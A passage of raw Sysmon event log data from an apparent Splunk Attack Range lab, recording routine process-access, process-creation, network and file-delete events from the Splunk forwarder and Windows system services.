09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979570Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979569Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979568Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979567Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979566Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979565Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979564Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979563Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.621{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8BAF-6151-DF79-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979562Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.606{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BAF-6151-DF79-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979561Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:27.606{69CF5F33-8BAF-6151-DF79-00000000FD01}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:25.871{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53416-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:28.480{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF44BEB26FB04858A11BBDA900A7F665,SHA256=9277C2F76118EE0400DB984BEBB3D52783751211F772472C88EEEA6100288320,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000979602Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BB0-6151-E179-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979601Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979600Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979599Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979598Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979597Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979596Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979595Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979594Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979593Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.903{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979592Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.887{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8BB0-6151-E179-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000979591Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.887{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8BB0-6151-E179-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000979590Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.888{69CF5F33-8BB0-6151-E179-00000000FD01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000979589Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:28.215{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8BB0-6151-E079-00000000FD01}1996C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000979588Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 